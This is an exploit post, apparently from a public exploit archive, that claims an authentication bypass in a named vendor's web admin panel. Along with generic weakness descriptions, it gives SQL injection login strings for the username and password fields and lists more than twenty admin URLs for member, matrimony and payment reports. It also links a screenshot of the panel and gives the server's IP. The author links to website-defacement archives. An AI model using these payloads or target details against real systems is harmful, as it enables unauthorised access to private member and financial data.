Gharuda Infotech Pvt Ltd Authentication Bypass

1. ####################################################################
2.  
3. # Exploit Title : Gharuda Infotech Pvt Ltd Authentication Bypass
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 28 May 2020
7. # Vendor Homepage : gharuda.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Vulnerability Type : CWE-287 [ Improper Authentication ]
12. CAPEC-115 [ Authentication Bypass ]
13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
15. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
16. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
17. zone-h.org/archive/notifier=CyBeRiZM
18. # Mirror-H : mirror-h.org/search/hacker/948/
19. mirror-h.org/search/hacker/94/
20. mirror-h.org/search/hacker/1826/
21. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
22. defacer.id/archive/team/Cyberizm-Org
23. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
24. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
25. aljyyosh.org/hacker.php?id=Cyberizm.Org
26. aljyyosh.org/hacker.php?id=Cyberizm
27. # Zone-D : zone-d.org/attacker/id/69
28. # Pastebin : pastebin.com/u/KingSkrupellos
29. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
30.  
31. ####################################################################
32.  
33. # Impact :
34. ***********
35. CWE-287 [ Improper Authentication ]
36. ************************************
37. Authentication is any process by which a system verifies the identity of a user who wishes
38. to access it.When an actor claims to have a given identity, the software does not
39. prove or insufficiently proves that the claim is correct. Improper authentication
40. occurs when an application improperly verifies the identity of a user.
41. A software incorrectly validates user's login information and as a result, an attacker can
42. gain certain privileges within the application or disclose sensitive information that allows
43. them to access sensitive data and provoke arbitrary code execution.
44. The weakness is introduced during Architecture and Design, Implementation stages.
45.  
46. CAPEC-115 [ Authentication Bypass ]
47. *************************************
48. An attacker gains access to application, service, or device with the privileges
49. of an authorized or privileged user by evading or circumventing an authentication mechanism.
50. The attacker is therefore able to access protected data without authentication ever having taken place.
51. This refers to an attacker gaining access equivalent to an authenticated user without ever going
52. through an authentication procedure. This is usually the result of the attacker using an unexpected
53. access procedure that does not go through the proper checkpoints where authentication should occur.
54. For example, a web site might assume that all users will click through a given link in order to get to
55. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
56. able to reach secured web content by explicitly entering the path to the content rather than clicking
57. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
58. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
59. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
60.  
61. ####################################################################
62.  
63. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
64. ******************************************************************************
65. Administrator Username : '=''or'
66.  
67. Administrator Password : '=''or'
68.  
69. Administrator Username : anything' OR 'x'='x
70.  
71. Administrator Username : anything' OR 'x'='x
72.  
73. Administrator Username : x' or 1=1 or 'x'='y
74.  
75. Administrator Password : x' or 1=1 or 'x'='y
76.  
77. /admin/index.php/Panel
78. /admin/index.php/OB_Designation
79. /admin/index.php/District
80. /admin/index.php/Type
81. /admin/index.php/Years
82. /admin/index.php/Advertisements_Slider
83. /admin/index.php/Bulk_Sms_Sender
84. /admin/index.php/Office_Bearers/OB_Creation
85. /admin/index.php/Office_Bearers
86. /admin/index.php/Members
87. /admin/index.php/Member_Report
88. /admin/index.php/Member_Report/normal_member_list
89. /admin/index.php/Member_Report/temporary_member_list
90. /admin/index.php/Member_Report/lifetime_member_list
91. /admin/index.php/Member_Report/member_quick_search
92. /admin/index.php/Matrimony
93. /admin/index.php/Matrimony_Report
94. /admin/index.php/Matrimony/Matrimony_Search
95. /admin/index.php/Matrimony/Matrimony_Closed
96. /admin/index.php/Matrimony/Matrimony_Receipt_Repo
97. /admin/index.php/Employ
98. /admin/index.php/Employment_Report
99. /admin/index.php/Employ/Employ_Closed
100. /admin/index.php/Employment_Report/employment_re
101. /admin/index.php/Paid_Unpaid_Report/Quick_Search
102. /admin/index.php/Paid_Unpaid_Report/Receipt_Report
103. /admin/index.php/Paid_Unpaid_Report/Paid_Report
104. /admin/index.php/Paid_Unpaid_Report/Online_Payment_Report
105.  
106. ScreenShot Administrator Control Panel =>
107.  
108. https://www.upload.ee/image/11783614/gharudasofwareexploit28520.png
109.  
110. Reverse IP results for (162.144.180.42)
111. There are 181 domains hosted on this server.
112.  
113. ####################################################################
114.  
115. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
116.  
117. ####################################################################